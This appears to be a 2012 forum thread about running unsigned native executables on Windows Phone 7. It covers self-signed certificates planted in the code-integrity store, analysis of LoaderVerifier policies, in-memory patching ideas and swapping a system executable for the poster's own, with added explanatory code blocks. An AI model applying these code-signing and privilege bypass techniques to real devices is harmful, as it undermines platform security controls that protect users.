[2012/06/03] IMPORTANT UPDATE HERE
Hi hackers,
This is meant as a little update on one of the projects I've been working on. I'm kinda stuck now. I have a suspicion of what the problem is. I thought that maybe if I write a post about it, me or someone else will have an idea on how to get this working.
The goal is to run native homebrew executables on WP7
This has not been done yet. All apps are Silverlight apps that are compiled as DLL and run by Taskhost.exe with least privileges. All other executables are signed by Microsoft. Executables that are compiled as ARM executable cannot be started.
The angle is to create a certificate that allows to sign a WP7 executable. Then add that to the appropriate certificate store. Create an executable. Sign it with the private key. Load it onto a WP7 device. Copy it to the Windows folder. Use an OEM driver to launch the executable.
First I did research on the certificate stores. I can now with certainty state that there are 4 certificate stores:
- CA
- Root
- My
- Code Integrity
After a lot of research I finally got complete read/write access to all of these stores. The Code Integrity store contains all the certificates that are used by the Loader Verifier to verify the executable that is being launched. When the device is launched for the first time, the certificates that are in \Windows\ciroots.p7b are installed to that certificate store. These certificates have these properties:
Key Usage = 0x86 = Digital Signature, Certificate Signing, Off-line CRL Signing, CRL Signing
Extended Key Usage = Code Signing (1.3.6.1.5.5.7.3.3) + Unknown key usage (1.3.6.1.4.1.311.10.3.14)
So I used OpenSSL to create such a certificate (with private key) for myself. And I installed the certificate in the Code Integrity store.
I then used VS2008 to create a completely barebone executable (ARMv4 Console app with only Sleep(-1) in the Main). I signed it with SignTool from Microsoft.
I loaded the executable to my device and I copied it to the \Windows folder (I think the policies restrict executing to only from that folder, but I'm not sure about that).
I use the Samsung driver to launch the executable, because I need at least Standard Rights to launch an executable. The Samsung driver has Elevated Rights. My own app has only Least Privileges. Using the Samsung driver does not return any success or fail codes. But looking at the Running Processes list, I don't see my Test.exe running. It should be, because the main thread is put to sleep infinitely.
So why is this not working?
Well, I have a guess. I think it's the policies that bind the certificates in the Code Integrity store to the different accounts/chambers. In the \Windows folder there are a lot of policy xml-files. On first boot, these are merged into PolicyCommit.xml and then compiled to policydb.vol. When the Loader Verifier (lvmod.dll) loads an executable, it queries the policies to determine access rights and chamber for that executable. The policies that matter in this context are defined in 8314B832-8D03-444f-9A2A-1EF6FADCC3B8.policy.xml. It's an xml-file that basically says this:
Code:
Microsoft Mobile Device Privileged PCA - ced778d7bb4cb41d26c40328cc9c0397926b4eea - not used in this context
Microsoft Mobile Device TCB PCA - 88bcaec267ef8b366c6e6215ac4028e7a1be2deb - honored by System Identity Group
Microsoft Mobile Device Unprivileged PCA - 1c8229f5c8d6e256bdcb427cc5521ec2f8ff011a - honored by Standard Right Identity Group
Microsoft Mobile Device VSD PCA - 91b318116f8897d2860733fdf757b93345373574 - not used in this context
VeriSign Mobile Root Authority for Microsoft - 069dbcca9590d1b5ed7c73de65795348e58d4ae3 - honored by LPC Identity Group
I should find a way to add a policy with my certificate in it. Any ideas?
Ciao,
Heathcliff74
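As an added example (not code from the post or from Microsoft), the checks the post describes reduced to plain Python: it decodes the Key Usage byte 0x86, checks for the two EKU OIDs, and maps a chain's root thumbprint to the identity group the policy binds it to. The OIDs and thumbprints are the post's own; the certificate dicts fed to it are constructed.

```python
# Added example: models the Loader Verifier checks described in the post.
# KEY_USAGE_BITS follows RFC 5280; the OIDs and the POLICY_ROOTS table are
# copied from the post, the sample certificates are constructed.

# X.509 KeyUsage bit positions (first byte of the BIT STRING, MSB first).
KEY_USAGE_BITS = {
    0: "Digital Signature",
    1: "Non Repudiation",
    2: "Key Encipherment",
    3: "Data Encipherment",
    4: "Key Agreement",
    5: "Certificate Signing",
    6: "CRL Signing",
    7: "Encipher Only",
}

OID_CODE_SIGNING = "1.3.6.1.5.5.7.3.3"
OID_MS_UNKNOWN = "1.3.6.1.4.1.311.10.3.14"   # the "unknown key usage" from the post
REQUIRED_EKUS = {OID_CODE_SIGNING, OID_MS_UNKNOWN}

# Root thumbprints and the identity group that honours them, as the post
# reads them out of 8314B832-8D03-444f-9A2A-1EF6FADCC3B8.policy.xml.
POLICY_ROOTS = {
    "88bcaec267ef8b366c6e6215ac4028e7a1be2deb": "System Identity Group",
    "1c8229f5c8d6e256bdcb427cc5521ec2f8ff011a": "Standard Right Identity Group",
    "069dbcca9590d1b5ed7c73de65795348e58d4ae3": "LPC Identity Group",
    "ced778d7bb4cb41d26c40328cc9c0397926b4eea": None,   # Privileged PCA, not used here
    "91b318116f8897d2860733fdf757b93345373574": None,   # VSD PCA, not used here
}


def decode_key_usage(first_byte: int) -> list:
    """Expand the first KeyUsage byte (e.g. 0x86) into its named flags.

    Bit 0 of the BIT STRING is the 0x80 position, so 0x86 sets bits 0, 5 and 6.
    """
    return [name for bit, name in KEY_USAGE_BITS.items() if first_byte & (0x80 >> bit)]


def check_signing_cert(cert: dict) -> list:
    """Return the reasons a certificate does not match the properties the post
    found on the ciroots.p7b certificates (empty list means it matches)."""
    problems = []
    usage = set(decode_key_usage(cert["key_usage"]))
    for needed in ("Digital Signature", "Certificate Signing", "CRL Signing"):
        if needed not in usage:
            problems.append("missing key usage: " + needed)
    for oid in sorted(REQUIRED_EKUS - set(cert["eku"])):
        problems.append("missing EKU: " + oid)
    return problems


def resolve_chamber(root_thumbprint: str) -> str:
    """Map the chain's root SHA-1 thumbprint to the identity group the policy
    binds it to. A root that sits in the Code Integrity store but is not
    referenced by the policy gets no group, which is the situation the post
    is stuck in with its self-made certificate."""
    group = POLICY_ROOTS.get(root_thumbprint.lower())
    if group is None:
        return "not honoured by any identity group"
    return group


if __name__ == "__main__":
    # Constructed sample: a certificate shaped like the ciroots.p7b ones.
    good = {"key_usage": 0x86, "eku": [OID_CODE_SIGNING, OID_MS_UNKNOWN]}
    print(decode_key_usage(0x86))
    print(check_signing_cert(good))
    print(resolve_chamber("88BCAEC267EF8B366C6E6215AC4028E7A1BE2DEB"))
```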
If you are able to re-sign an executable that is already in the ROM, I would try that, so you know the problem isn't within the native code, but only with the signing. Or maybe the other way round, which would be awesome.
regards
Flow WP7 said:
If you are able to re-sign an executable that is already in the ROM, I would try that, so you know the problem isn't within the native code, but only with the signing. Or maybe the other way round, which would be awesome.
regards
That's a good idea. I must say that I don't have much faith in the current RecMod tools for WP7 right now. I am able to get the binaries recmodded so that I can disassemble them correctly. But I don't think they can be easily launched. But there are executables that are on the rom as complete binaries, instead of rom-modules. To begin with, I have to select one that does not need many privileges to run and try to sign that one and then run it.
I'm really busy with work right now, so I think I won't be able to try it until the day after tomorrow. But I will try it and will let you know how that went.
Thanks!
Decompiled taskhost.exe, so it gets easier for us to see if it's able to make taskhost start another exe for us. Lots of code though (C code).
taskhost.c (276 KB) in attachments.
edit: Oh, WOW, this really shows how to call those anonymous methods without a call signature: "Hello" (signature: "??z_Hello_?mze")
Hmm, pretty much about the pause part?
Code:
if ( v10 )
{
    a7 = sub_178E7(v10);
    if ( a7 >= 0 )
    {
        a7 = sub_180A5(v7, v7 + 64);
        if ( a7 >= 0 )
        {
            a7 = ThemeInitialize(v7 + 136);
            if ( a7 >= 0 )
            {
                v11 = sub_1862B(v13, v7);
                EnableHostAutoDehydration(v11 == 3);
                v16 = 0;
                a7 = InitializeEmClientEx(&a2, 0, &v16);
                if ( a7 >= 0 )
                {
                    a7 = RegisterPausedHostCallback(sub_19D0D, 0);
                    if ( a7 >= 0 )
                    {
                        a7 = RegisterResumingHostCallback(sub_19D31, 0);
                        if ( a7 >= 0 )
                        {
                            if ( v11 != 3
                              || (a7 = RegisterDehydrateHostCallback(sub_19D76, 0), a7 >= 0)
                              && (a7 = RegisterFreezeHostCallback(sub_19D97, 0), a7 >= 0) )
                            {
                                a7 = RegisterExitHostCallback(sub_19D55, 0);
                                if ( a7 >= 0 )
                                    a7 = sub_17C0A(*(_DWORD *)(v7 + 128), 0);
                            }
                        }
                    }
                }
            }
        }
    }
}
UIX framework entry-point (exe)
Code:
int __cdecl sub_11114(int a1, int a2, int a3)
{
    int v4;   // [sp+0h] [bp-38h]@1
    char Dst; // [sp+4h] [bp-34h]@1
    int v6;   // [sp+8h] [bp-30h]@1
    int v7;   // [sp+Ch] [bp-2Ch]@1
    int v8;   // [sp+18h] [bp-20h]@1
    int v9;   // [sp+28h] [bp-10h]@1
    v4 = 0;
    memset(&Dst, 0, 0x34u);
    v8 = a3;
    v6 = (int)L"res://FlightModeUXDLL!FlightMode.uix";
    v7 = (int)L"FMMain";
    v9 = 2;
    RunApplication(&v4);
    return dword_12034;
}
C++ converted
Code:
// Reconstruction of the block RunApplication() receives; field names are guesses
// from the decompile above (v4, Dst, v6, v7, v8, v9), the strings are wide strings.
struct UIXApplicationInfo
{
    int UNK_v4;                   // always 0
    char Dst;                     // start of the zeroed area (memset 0x34 bytes)
    const wchar_t* uixFile;       // v6
    const wchar_t* uixEntryPoint; // v7
    int UNK_v8;                   // a3 passed straight through
    int UNK_v9;                   // always 2
};

UIXApplicationInfo app = { 0 };
app.uixFile = L"res://FlightModeUXDLL!FlightMode.uix";
app.uixEntryPoint = L"FMMain";
app.UNK_v8 = a3;
app.UNK_v9 = 2;
RunApplication(&app);
Then just figure out the UIX part (or test the existing "res://FlightModeUXDLL!FlightMode.uix" if it launches, if so, we made it).
___
Found this in mango dump:
> Uninstall provxml
Code:
<!-- Uninstall Xbox LIVE Extras App -->
<characteristic type="AppInstall">
    <nocharacteristic type="{0c17d153-b5d5-df11-a844-00237de2db9e}"/>
</characteristic>
Is there a reason you can't just use COM interop to run native code? Check out this thread for a discussion covering the technique: http://forum.xda-developers.com/showthread.php?t=820455
athompson said:
Is there a reason you can't just use COM interop to run native code? Check out this thread for a discussion covering the technique: http://forum.xda-developers.com/showthread.php?t=820455
Hello "co-founder of native code on WP7"
I'm fully aware of the possibility of native code through COM. I use it for example in the WP7 Root Tools. But I just wanted to take it a step further. Running native executables gives a lot more freedom. Not being bound to the watchdog, getting higher privileges and running in the background, for instance. But there's a whole lot more. So that's why I started research on it. Thanks anyway. You helped make native code possible on WP7.
Ciao,
Heathcliff74
The taskhost.exe is our RAM, because our app runs in it, giving us full RAM access inside our "virtual RAM". So that means we own all strings, ints, floats etc. Then rewrite the RAM to change strings in mscorlib. The checksum of whether an exe has been modified is only checked at startup, without checking if we modify the dll at runtime.
My purpose with this is that some functions call external apps, where we rewrite the args going into the function. Just find an exploitable function and modify it after JIT has been there once before, generating the pre-RAM, that we modify and call yet again but with the modified RAM values behind.
Marshal.Copy, my friends, there.
[SecurityFuckingSafeCritical]
(byte[] source, IntPtr destination, int length)
> Interopservices leaked dll (\windows)
destination = our ram ptr to modify.
fiinix said:
The taskhost.exe is our RAM, because our app runs in it, giving us full RAM access inside our "virtual RAM". So that means we own all strings, ints, floats etc. Then rewrite the RAM to change strings in mscorlib. The checksum of whether an exe has been modified is only checked at startup, without checking if we modify the dll at runtime.
My purpose with this is that some functions call external apps, where we rewrite the args going into the function. Just find an exploitable function and modify it after JIT has been there once before, generating the pre-RAM, that we modify and call yet again but with the modified RAM values behind.
Marshal.Copy, my friends, there.
[SecurityFuckingSafeCritical]
(byte[] source, IntPtr destination, int length)
> Interopservices leaked dll (\windows)
destination = our ram ptr to modify.
Hmmm. 10 points for inventiveness. But I don't think it's going to work. Even if you could find a function where the executable is passed as argument you still don't have enough privileges. Most code will have the path to the executable hardcoded instead of an argument. And you will still run under TaskHost with Least Privileges. And you need to have at least Standard Privileges or higher to launch most executables with CreateProcess() or ShellExecuteEx().
Sent from my OMNIA7 using XDA Windows Phone 7 App
Heathcliff74 said:
Hmmm. 10 points for inventiveness. But I don't think it's going to work. Even if you could find a function where the executable is passed as argument you still don't have enough privileges. Most code will have the path to the executable hardcoded instead of an argument. And you will still run under TaskHost with Least Privileges. And you need to have at least Standard Privileges or higher to launch most executables with CreateProcess() or ShellExecuteEx().
Sent from my OMNIA7 using XDA Windows Phone 7 App
"And you will still run under TaskHost with Least Privileges"
I know, I don't need standard rights to do it. Because I call a mscorlib function that is trusted code. I think you saw my idea wrong, let me show you.
[mscorlib, SecuritySafeCritical]
public static void example(string str)
{
    string mscorlibStr = "you cant change my value ";
    Debug.WriteLine(mscorlibStr + str);
}
This is where we modify "mscorlibStr" in ram and the function is still trusted code. But its doing something totally different from that it would do.
fiinix said:
"And you will still run under TaskHost with Least Privileges"
I know, I don't need standard rights to do it. Because I call a mscorlib function that is trusted code. I think you saw my idea wrong, let me show you.
[mscorlib, SecuritySafeCritical]
public static void example(string str)
{
    string mscorlibStr = "you cant change my value ";
    Debug.WriteLine(mscorlibStr + str);
}
This is where we modify "mscorlibStr" in ram and the function is still trusted code. But its doing something totally different from that it would do.
I really hate to break it for you. But the [SecuritySafeCritical] is indeed trusted code, but it will still check your privileges. All the API functions that do system modifications like that, do the security checks. Read the note under SecuritySafeCriticalAttribute here. Also read this; same problem. You are in process TaskHost.exe and it is launched in LPC (Least Privilege Chamber), so every CeImpersonateToken() to do the important stuff will fail and return an error code. I also wouldn't know how you would modify the stack-frame of a function that you call. Seems impossible to me, because at the moment you call the function, that stack-frame has not been allocated yet.
Anyway, although I don't think that is going to work in any way, I absolutely don't want to discourage you, because my experience is that when you try enough, sooner or later you will find an exploit.
Ciao,
Heathcliff74
Currently installing "Windows Embedded Compact 7", because this lousy ARMv4 compiler (from WM5-6) maybe generates wrong ARM op-codes (WP7 runs ARMv7), therefore it says "Invalid program signature" (or whatever error it was).
Maybe ARMv7 isn't even backwards compatible with ARMv4.
By compiling with the ARMv7 compiler from WEM7, it will probably (hope) generate a valid exe.
That's it..
edit:
*Research
"Armv7 is the processor instruction set used starting with the S5L8920 in the iPhone 3GS and in all subsequent devices. Processors that support Armv7 instructions are backward compatible with Armv6 instructions, but attempting to run binaries compiled for Arm7 on older, Armv6 processors will result in the error: "Bad CPU type in executable"."
Source: http://theiphonewiki.com/wiki/index.php?title=Armv7
___
"As I said in the past, the ARMv6 CTR was kept backwards compatible with earlier versions of the ARM architecture (and ARM tried to keep it like this as much as possible). With ARMv7, you have multiple levels of cache and different types (e.g. ASID-tagged VIVT I-cache). There is no way you could encode the useful information while keeping the same (and only) register, hence the need for a new register."
Source: http://www.spinics.net/lists/arm-kernel/msg58813.html
As I see this (^), all ARMv > 6 == no backwards
ARMv6 had backwards to 4
ARMv7 >> ARMv6 compatibility, not more.
_
Problem officer even running ARMv4???
>On a non ARMv4 backwards compatibility CPU.
Profit!!
__
[ExeX.exe] (the one that i recompiled to a state: "this has to work")(ARMv4)
Decompilation:
Code:
; Attributes: bp-based frame
EXPORT start
start
var_20= -0x20
oldR4= -0x1C
oldR5= -0x18
oldR6= -0x14
oldR7= -0x10
oldR11= -0xC
oldSP= -8
oldLR= -4
MOV R12, SP
STMFD SP!, {R4-R7,R11,R12,LR}
ADD R11, SP, #0x1C
SUB SP, SP, #4
MOV R4, R3
MOV R5, R2
MOV R6, R1
MOV R7, R0
.
Next up, decompile an ARMv7 from a raw device. (how, someone has one)
fiinix said:
Next up, decompile an ARMv7 from a raw device. (how, someone has one)
I think you'll find what you're looking for here: http://forum.xda-developers.com/showthread.php?t=681659 in the dump of the IMAGEFS. What did you use to decompile it? IDA Pro, or a different thing?
athompson said:
I think you'll find what you're looking for here: http://forum.xda-developers.com/showthread.php?t=681659 in the dump of the IMAGEFS. What did you use to decompile it? IDA Pro, or a different thing?
IDA Pro, yes. I'll see if I can dump that "nbh" (used to nb0), and extract a fully operable exe that is not corrupted.
fiinix said:
IDA Pro, yes. I'll see if I can dump that "nbh" (used to nb0), and extract a fully operable exe that is not corrupted.
First use Andim's WP7 Rom Tools to extract the rommodules. Remember to always dump a folder, not a single file.
Then use Denomitor's version of Recmod and follow the instructions in the post. That works most of the time.
Going forward
Currently building the WP7 ARMv7 commandline, getting closer.
Current cmd (not working, no need to help):
Code:
"C:\WINCE700\sdk\bin\i386\arm\cl.exe" /Od /D "_DEBUG" /D "_WIN32_WCE=0x700" /D "UNDER_CE" /D "ZUNE_HD" /D "WINCE" /D "DEBUG" /D "_WINDOWS" /D "ARM" /D "_ARM_" /D "_UNICODE" /D "UNICODE" /D "_CRT_SECURE_NO_WARNINGS" /Gm /EHsc /MTd /Gy /fp:fast /GR- /Fo"C:\Users\Steven VM\Desktop\ARMv7\Build\Debug/" /Fd"C:\Users\Steven VM\Desktop\ARMv7\Build\Debug/vc80.pdb" /W3 /c /Zi /TP /QRfpe- /QRarch7 "C:\Users\Steven VM\Desktop\ARMv7\main.cpp"
/QRarch7 is the ARMv7.
edit:
HOORRY SHEEAT
generated:
> main.obj
> vc80.idb
> vc80.pdb
, feels soo good:
main.exe is there.
IDA Pro says "ARM AND THUMB MODE SWITCH INSTRUCTIONS", just like others.
Code:
; Input MD5 : B50E8D8395DE7CA2419464DC3CE0BC74
; File Name : C:\Users\Steven\Desktop\burn\main.exe
; Format : Portable executable for ARMI (PE)
; Imagebase : 10000
; Section 1. (virtual address 00001000)
; Virtual size : 00000018 ( 24.)
; Section size in file : 00000200 ( 512.)
; Offset to raw data for section: 00000400
; Flags 60000020: Text Executable Readable
; Alignment : default
; Processor : ARM
; Target assembler: Generic assembler for ARM
; Byte sex : Little endian
; Segment type: Pure code
AREA .text, CODE, READWRITE, ALIGN=4
; ORG 0x11000
CODE32
EXPORT start
start
var_4= -4
SUB SP, SP, #4
MOV R3, #1
STR R3, [SP,#4+var_4]
LDR R0, [SP,#4+var_4]
ADD SP, SP, #4
BX LR
; End of function start
Made an empty entry point as from above ^:
Code:
int wWinMainCRTStartup()
{
    return 1;
}
PE Explorer (main.exe):
Machine: THUMB
Operating System Version: 7.0
Image Version: 7.0
Subsystem Version: 7.0
Subsystem: WinCE GUI
**** so CLOSE!
Successfully copied "main.exe" and "ExeX.exe" to "\Windows", where I have the right to launch them remotely.
Method:
WP7Process p = device.LaunchEXE(@"main.exe", "");
main.exe (no signing, ARMv7):
System.UnauthorizedAccessException: Access is denied.
WP7Process p = device.LaunchEXE(@"ExeX.exe", "");
ExeX.exe (signed with CA/ROOT custom, ARMv4):
System.Runtime.InteropServices.COMException (0x800704EC): This program is blocked by group policy. For more information, contact your system administrator.
There ARE different things going on! Something is missing, but what?
edit:
Signed main.exe with custom XDA ROOT certificate (ARMv7):
signtool.exe sign /sha1 "[CertChomp]" "main.exe"
> Now main.exe also gets "This program is blocked by group policy. For more information, contact your system administrator."
I'll see if I can add it to the startup list, if it boots from there.
edit 2:
Nope, gonna hijack "fieldtestapp.exe" with my app because policy says:
Risky-mode.Activate();
Backup(fieldtestapp.exe, backupPath);
Copy(main.exe, > fieldtestapp.exe);
"LOADERVERIFIER_ROUTE_BY_NAME"
"LOADERVERIFIER_EXE_AUTHZ_INROM_ROOT"
<Rule Description="Route fieldtestapp.exe" ResourceIri="$(LOADERVERIFIER_ROUTE_BY_NAME)/PRIMARY/WINDOWS/FIELDTESTAPP.EXE" SpeakerAccountId="$(SYSTEM_USER_NAME)" PriorityCategoryId="PRIORITY_LOW">
    <Authorize>
        <Match AccountId="$(FIELDTESTAPP_EXE_SID)" AuthorizationIds="LV_ACCESS_EXECUTE" />
    </Authorize>
</Rule>
<Rule Description="Authorize fieldtestapp.exe be loadable to $(FIELDTESTAPP_EXE_SID) and chambers" ResourceIri="$(LOADERVERIFIER_EXE_AUTHZ_INROM_ROOT)/WINDOWS/FIELDTESTAPP.EXE" SpeakerAccountId="$(SYSTEM_USER_NAME)" PriorityCategoryId="PRIORITY_STANDARD">
    <Authorize>
        <Match AccountId="$(FIELDTESTAPP_EXE_SID)" AuthorizationIds="LV_ACCESS_EXECUTE,LV_ACCESS_LOAD" />
    </Authorize>
</Rule>
edit 3:
Seems like "fieldtestapp.exe" is ROM locked. Need to try out some other targets.
edit 4:
Target acquired "ProximitySensorDisable.exe" > "ProximitySensorDisableBackup.exe"
Successful copy == no ROM lock.
edit 5:
There exist two types of talking to the LoaderVerifier (the: This program is blocked by group policy.):
Direct exe name OR special certificate
How we do:
> Direct exe (hijack exe)
How we can't do (SHA1) (Nope, ain't gonna happen):
> We certainly don't have Microsoft's certificate so this way is a no-do, haha lol, no do way.
(1: direct exe name) /LOADERVERIFIER/GLOBAL/AUTHORIZATION/PE_AUTHZ/NONE/NONE/PRIMARY/WINDOWS/CFGHOST.EXE
(2: static/pre certificates) /LOADERVERIFIER/GLOBAL/CERTIFICATES/HASH/SHA1/91B318116F8897D2860733FDF757B93345373574
edit 6:
Yep, loads of edits, just for you.
Allowed exes to run (sorted a-z) (direct exe) (pre-cert removed):
Code:
ACCESSIBILITYCPL.EXE
ACCOUNTSMANAGER.EXE
ALARMS.EXE
APPCHECKERSHIM.EXE
APPPREINSTALLER.EXE
AUTODATACONFIG.EXE
AUTOSIM.EXE
AUTOTIMEUPDATE.EXE
BRIGHTNESSCPL.EXE
BTUXCPL.EXE
CALENDARAPP.EXE
CALLSETTINGSHOST.EXE
CALNOT.EXE
CALUPD.EXE
CAM_FW_UPDATE_UI.EXE
CELLUXCPL.EXE
CERTINSTALLER.EXE
CFGHOST.EXE
CFLAUNCHER.EXE
CHDIALERHOST.EXE
CIPHASE2.EXE
CLIENTSHUTDOWN3.EXE
CLOCKNOT.EXE
CMACCEPT3.EXE
COLDINIT.EXE
COMMSVC.EXE
COMPOSITOR.EXE
CONFIGDM.EXE
CONFIGXML.EXE
CONMANCLIENT3.EXE
CONTACTS.EXE
CPROG.EXE
DATETIMECPL.EXE
DCVSSWITCH.EXE
DEPOTCOPY.EXE
DEVICEFEEDBACKCPL.EXE
DEVICEREG.EXE
DIAGPORTCHANGETEST.EXE
DLLHOST.EXE
DMSCHEDULERCALLBACK.EXE
DMSRV.EXE
DMSTOOLS.EXE
DUACLIENT.EXE
DW.EXE
EDM3.EXE
EMAIL.EXE
EMAILSETUP.EXE
ENDPOINT.EXE
FCROUTERCMDTEST.EXE
FIELDTESTAPP.EXE
FLIGHTMODE.EXE
GAMESUX.EXE
IEXPLORE.EXE
INITIATEDMSESSION.EXE
INVALIDLICENSEUXLAUNCHER.EXE
KEYBOARDCPL.EXE
LASSCREDENTIALEXPIRATIONCHECK.EXE
LASSRESTARTER.EXE
LIVETOKEN.EXE
LOCKCPL.EXE
LOOPBACKTEST.EXE
MEDIAGROVEL.EXE
MEUX.EXE
MITSMAN.EXE
MMSPRPROXY.EXE
MMSTRANSHOST.EXE
MULTIMEDIALAUNCHER.EXE
MYPHONECPL.EXE
MYPHONETASKSRUNTIME.EXE
NATIVEINSTALLERHOST.EXE
OFFICEURL.EXE
OMADMCLIENT.EXE
OMADMPRC.EXE
OMHUB.EXE
ONBOOTSQM.EXE
ONENOTEMOBILE.EXE
OOBE.EXE
PACMANINSTALLER.EXE
PHOTOENT.EXE
PHOTOENTCAPTURE.EXE
PHOTOUPLOADER.EXE
PPT.EXE
PWORD.EXE
PWRLOGCTRL.EXE
PXL.EXE
RAPICONFIG.EXE
REGIONCPL.EXE
RMACTIVATE.EXE
SAPISVR.EXE
SECSIMTKIT.EXE
SERVICESD.EXE
SERVICESSTART.EXE
SETTELEPORTMODE.EXE
SETTINGS3.EXE
SHORTMSG.EXE
SICLNT.EXE
SIGNALEVENT.EXE
SIREPSERVERAPPDEV.EXE
SMSETTINGS.EXE
SMSTRANSPORT.EXE
SOUNDCPL.EXE
SPEECHCPL.EXE
SPMC.EXE
SQMEVENT.EXE
SSUPDATE.EXE
TASKHOST.EXE
TELSHELL.EXE
TESTSHOW.EXE
THEMECPL.EXE
TOGGLEBROWSERHIBERNATION.EXE
TOGGLEDOG.EXE
UDEVICE.EXE
UIF.EXE
UNIFIEDPAIR.EXE
USBMGR.EXE
WEBSEARCH.EXE
WIFIUXSPLASH.EXE
WLANEXT.EXE
WLIDSETUP.EXE
WWANDATAMGR.EXE
XDRMREMOTESERV.EXE
ZIPVIEW.EXE
ZMFTASKLAUNCH.EXE
The code (yes, I know it's super unoptimized, quickly put together):
Code:
using System.IO;
using System.Linq;
using System.Xml.Linq;

// Walk the dumped policy and list every executable that a LoaderVerifier
// rule authorizes by path; the certificate-hash rules are skipped.
var doc = XDocument.Load(File.OpenRead("SamsungOmnia7_BasePolicy_webserver.xml"));
var ea = doc.Root.Elements()
    .Where(x => x.Name.LocalName == "Rule")
    .Where(x => x.Attribute("ResourceIri") != null)
    .Where(x =>
    {
        var r = x.Attribute("ResourceIri").Value;
        return r.Contains("LOADERVERIFIER") && r.ToLower().Contains(".exe") && !r.Contains("CERTIFICATES");
    })
    .Select(x =>
    {
        // keep only the last path segment, i.e. the EXE name
        var v = x.Attribute("ResourceIri").Value;
        var l = v.LastIndexOf('/');
        return v.Substring(l + 1);
    })
    .Distinct()
    .OrderBy(x => x)
    .ToArray();
edit 7:
yeah, lol i say too.
Unprotected exe (FCRouterCmdTest.exe)
> c:\Project Work\SGH-i707(Cetus)\FCRouterCmdTest\Windows Mobile 6 Professional SDK (ARMV4I)\Release\FCRouterCmdTest.pdb
mfw samsung use "Windows Mobile 6 Professional SDK (ARMV4I)"
Wow, this truly was a big step today
Done hacking today.
"After a day, there comes another day"
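As an added example (not code from the thread), the two LoaderVerifier routes described in the post above, path rule versus certificate hash, modelled as a small policy parser in Python. It generalizes the C# query from the post to also collect the certificate-hash rules and the AuthorizationIds each rule grants; the policy document it parses is constructed in the shape of the rules quoted in the post, not a real dump.

```python
import xml.etree.ElementTree as ET

# Constructed sample, shaped like the rules quoted in the thread (not a real
# policy dump). The $(...) macros are left unexpanded, as they are in the files.
SAMPLE_POLICY = """<Policy>
  <Rule Description="Route fieldtestapp.exe"
        ResourceIri="$(LOADERVERIFIER_ROUTE_BY_NAME)/PRIMARY/WINDOWS/FIELDTESTAPP.EXE"
        SpeakerAccountId="$(SYSTEM_USER_NAME)" PriorityCategoryId="PRIORITY_LOW">
    <Authorize>
      <Match AccountId="$(FIELDTESTAPP_EXE_SID)" AuthorizationIds="LV_ACCESS_EXECUTE" />
    </Authorize>
  </Rule>
  <Rule Description="Authorize fieldtestapp.exe in ROM"
        ResourceIri="$(LOADERVERIFIER_EXE_AUTHZ_INROM_ROOT)/WINDOWS/FIELDTESTAPP.EXE"
        SpeakerAccountId="$(SYSTEM_USER_NAME)" PriorityCategoryId="PRIORITY_STANDARD">
    <Authorize>
      <Match AccountId="$(FIELDTESTAPP_EXE_SID)" AuthorizationIds="LV_ACCESS_EXECUTE,LV_ACCESS_LOAD" />
    </Authorize>
  </Rule>
  <Rule Description="cfghost.exe by name"
        ResourceIri="/LOADERVERIFIER/GLOBAL/AUTHORIZATION/PE_AUTHZ/NONE/NONE/PRIMARY/WINDOWS/CFGHOST.EXE"
        SpeakerAccountId="$(SYSTEM_USER_NAME)" PriorityCategoryId="PRIORITY_STANDARD">
    <Authorize>
      <Match AccountId="$(CFGHOST_EXE_SID)" AuthorizationIds="LV_ACCESS_EXECUTE" />
    </Authorize>
  </Rule>
  <Rule Description="VSD PCA root (constructed AccountId)"
        ResourceIri="/LOADERVERIFIER/GLOBAL/CERTIFICATES/HASH/SHA1/91B318116F8897D2860733FDF757B93345373574"
        SpeakerAccountId="$(SYSTEM_USER_NAME)" PriorityCategoryId="PRIORITY_STANDARD">
    <Authorize>
      <Match AccountId="$(SYSTEM_USER_NAME)" AuthorizationIds="LV_ACCESS_EXECUTE" />
    </Authorize>
  </Rule>
</Policy>"""


def parse_loader_verifier_rules(xml_text):
    """Split LoaderVerifier rules into the two routes the post describes.

    Returns (by_name, by_cert): EXE name -> set of AuthorizationIds, and
    lowercase SHA-1 thumbprint -> set of AuthorizationIds. Rules are found
    anywhere in the tree, not only as direct children of the root.
    """
    root = ET.fromstring(xml_text)
    by_name, by_cert = {}, {}
    for rule in root.iter("Rule"):
        iri = rule.get("ResourceIri")
        if not iri or "LOADERVERIFIER" not in iri:
            continue
        granted = set()
        for match in rule.iter("Match"):
            ids = match.get("AuthorizationIds", "")
            granted.update(i for i in ids.split(",") if i)
        leaf = iri.rsplit("/", 1)[-1]
        if "/CERTIFICATES/HASH/SHA1/" in iri:
            by_cert.setdefault(leaf.lower(), set()).update(granted)
        elif leaf.upper().endswith(".EXE"):
            by_name.setdefault(leaf.upper(), set()).update(granted)
    return by_name, by_cert


def allowed_exes(xml_text):
    """The sorted a-z list of path-authorized executables, as in the post."""
    by_name, _ = parse_loader_verifier_rules(xml_text)
    return sorted(by_name)


def explain_decision(xml_text, exe_name, signer_sha1):
    """Which route, if any, would let a file through: an exact-name path rule,
    or a signer whose SHA-1 is in the policy. Neither gives the 0x800704EC
    "blocked by group policy" outcome the post ran into."""
    by_name, by_cert = parse_loader_verifier_rules(xml_text)
    if exe_name.upper() in by_name:
        return "allowed by path rule"
    if signer_sha1.lower() in by_cert:
        return "allowed by certificate hash"
    return "blocked by group policy"


if __name__ == "__main__":
    print(allowed_exes(SAMPLE_POLICY))
    print(explain_decision(SAMPLE_POLICY, "main.exe", "0000000000000000000000000000000000000000"))
```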
@fiinix,
You did a lot of testing. Good job, man.
A few comments:
0x800704ec "blocked by group policy" is THE error of the new WP7 security model. It is basically telling you to go f*ck yourself. Everything you do without enough privileges or capabilities results in this error.
The two ways of policies, exe-path and cert-hash, are the result of the difference between rom-modules and executables that are signed and added as a file. Rom-modules are not even normal files. You can't open and read them. They are executable sections that are mapped in rom-address-space. You can only call LoadLibrary() and CreateProcess() on them. Since they are only executable sections, they don't have a signature, like a normal executable file would have. Therefore they are referred to with an exe-path. You may safely assume that every path to an executable in the policy files is referring to a rom-module and can't be overwritten in any way (except by cooking your own rom - who is going to unlock our bootloaders?!?). Other than that, there are a few signing certs that Microsoft has, signing the different executables with different privileges and accordingly a different cert. Their hashes are in the policies.
Using ARMv7 isn't going to add much, I'm afraid. Although it may make a difference in the exe-header. But you've seen tools that were really old, remember? And they were signed to have TCB access. And they were compiled for ARMv4. So it should not make much difference.
